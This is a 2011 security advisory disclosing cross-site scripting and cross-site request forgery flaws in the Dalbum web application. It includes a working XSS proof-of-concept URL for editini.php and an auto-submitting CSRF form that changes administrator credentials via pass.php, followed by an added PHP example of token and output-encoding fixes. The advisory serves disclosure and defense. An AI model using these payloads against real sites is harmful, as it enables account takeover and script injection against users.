Multiple Vulnerabilities in Dalbum

2011-04-05T00:00:00
ID HTB22941
Type htbridge
Reporter High-Tech Bridge
Modified 2011-04-05T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Dalbum which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerability in Dalbum
The vulnerability exists due to an input sanitization error in the "url" parameter in editini.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
http://[host]/editini.php?album=/Sample%20album/&url=1%27%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

2) Cross-site request forgery (CSRF) vulnerability in Dalbum
The vulnerability exists due to insufficient validation of the request origin in pass.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator's credentials.
Exploitation example:
<form action="http://[host]/pass.php" method="post" name="main" />
<input name="user" value="1" type="hidden" />
<input name="pass" value="1" type="hidden" />
<input name="passc" value="1" type="hidden" />
<input type="hidden" name="action" value="add">
<input type="submit" id="btn" name="submit" value="Submit ››">
</form>
<script>
document.getElementById('btn').click();
</script>
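Hardened handling of both issues, as an added example that is not Dalbum's own code: the script, parameter and action names come from the advisory, while the session-token scheme, function names and form layout are this example's own assumptions.

```php
<?php
// Added example (not Dalbum's code): hardened handling for the two issues above.
// Assumes PHP sessions are in use; function and token names are this example's own.
session_start();

// --- CSRF protection for pass.php -----------------------------------------
// Issue one unguessable token per session and embed it in the password form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject any POST whose token does not match the one stored in the session.
// A form hosted on another site cannot read the victim's session token, so a
// cross-site submission like the one above fails here before credentials change.
function require_valid_csrf_token(): void {
    $sent = $_POST['csrf_token'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid request origin.');
    }
}

// --- Output encoding for the "url" parameter in editini.php ---------------
// Encoding quotes and angle brackets renders 1'><script>... as inert text
// inside the attribute instead of breaking out of it.
function html_attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'add') {
    require_valid_csrf_token();
    // ... update user/pass/passc only after the token check has passed ...
}

$url = (string)($_GET['url'] ?? '');
?>
<form action="pass.php" method="post">
  <input type="hidden" name="csrf_token" value="<?= html_attr(csrf_token()) ?>">
  <input type="hidden" name="action" value="add">
  <input name="user"> <input name="pass" type="password"> <input name="passc" type="password">
  <input type="submit" value="Submit">
</form>
<input name="url" value="<?= html_attr($url) ?>">
```

Marking the session cookie SameSite=Lax (or Strict) adds a second, browser-enforced layer against the cross-site POST, but the token check is what makes the credential change depend on something the attacker's page cannot obtain.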